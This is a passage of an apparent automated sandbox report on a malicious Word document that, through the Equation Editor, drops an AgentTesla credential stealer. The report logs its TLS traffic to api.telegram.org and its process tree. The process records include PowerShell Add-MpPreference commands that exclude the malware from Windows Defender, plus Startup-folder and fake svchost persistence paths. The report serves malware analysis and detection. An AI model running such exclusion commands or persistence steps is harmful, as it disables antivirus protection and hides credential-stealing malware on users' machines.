					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:28.208740950 CEST	149.154.167.220	443	192.168.2.22	49169	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:40.836798906 CEST	149.154.167.220	443	192.168.2.22	49171	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:46.882860899 CEST	149.154.167.220	443	192.168.2.22	49172	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:53.250591040 CEST	149.154.167.220	443	192.168.2.22	49173	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:59.895298958 CEST	149.154.167.220	443	192.168.2.22	49174	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:20:01.075529099 CEST	149.154.167.220	443	192.168.2.22	49175	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:20:01.352283955 CEST	149.154.167.220	443	192.168.2.22	49176	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:20:05.841473103 CEST	149.154.167.220	443	192.168.2.22	49177	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 764 Parent PID: 584

General

Start time:	20:17:33
Start date:	04/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f730000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2520 Parent PID: 584

General

Start time:	20:17:34
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: CTF loader_es.exe PID: 2708 Parent PID: 2520

General

Start time:	20:17:39
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
Imagebase:	0xb50000
File size:	3367424 bytes
MD5 hash:	D96F52FC8733D2F4A127BDC44D4CEB25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 19%, Metadefender, Browse Detection: 45%, ReversingLabs
Reputation:	low

Analysis Process: powershell.exe PID: 2340 Parent PID: 2708

General

Start time:	20:17:44
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 260 Parent PID: 2708

General

Start time:	20:17:44
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2768 Parent PID: 2708

General

Start time:	20:17:45
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2460 Parent PID: 2708

General

Start time:	20:17:46
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 2916 Parent PID: 2708

General

Start time:	20:17:51
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Imagebase:	0x820000
File size:	3367424 bytes
MD5 hash:	D96F52FC8733D2F4A127BDC44D4CEB25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2191309843.00000000039DA000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 19%, Metadefender, Browse Detection: 45%, ReversingLabs
Reputation:	low

Analysis Process: powershell.exe PID: 2200 Parent PID: 2708

General

Start time:	20:17:52
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2248 Parent PID: 2708

General

Start time:	20:17:52
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 2328 Parent PID: 2708

General

Start time:	20:17:53
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 1836 Parent PID: 1388

General

Start time:	20:17:56
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Imagebase:	0x820000
File size:	3367424 bytes
MD5 hash:	D96F52FC8733D2F4A127BDC44D4CEB25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: CTF loader_es.exe PID: 2520 Parent PID: 2708

General

Start time:	20:18:03
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
Imagebase:	0xb50000
File size:	3367424 bytes
MD5 hash:	D96F52FC8733D2F4A127BDC44D4CEB25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2354759653.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: powershell.exe PID: 2568 Parent PID: 2916

General

Start time:	20:18:03
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 2888 Parent PID: 2916

General

